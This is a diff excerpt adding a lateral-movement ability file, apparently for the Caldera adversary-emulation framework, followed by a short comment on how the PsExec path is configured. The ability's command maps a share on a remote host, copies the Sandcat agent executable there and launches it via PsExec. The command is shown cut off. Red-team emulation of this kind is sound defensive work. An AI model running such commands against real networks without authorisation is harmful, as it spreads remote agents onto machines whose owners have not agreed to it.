data/abilities/lateral-movement/620b674a-7655-436c-b645-bc3e8ea51abd.yml

```diff
@@ -0,0 +1,14 @@
+- description: Copy Sandcat file using PsExec on CMD
+  id: 620b674a-7655-436c-b645-bc3e8ea51abd
+  name: Copy Sandcat File using PsExec on CMD
+  platforms:
+    windows:
+      cmd:
+        command: 'net /y use \\#{remote.host.name} & copy /y sandcat_v2.go-windows.exe
+          \\#{remote.host.name}\Users\Public & #{psexec.path} -accepteula \\#{remote.host.name}
```

Comment:
The psexec path is set by the user. I did not make the ability use a fixed path for psexec, since the psexec executable could be stored anywhere.  If the fact is set by any other method, it should work too.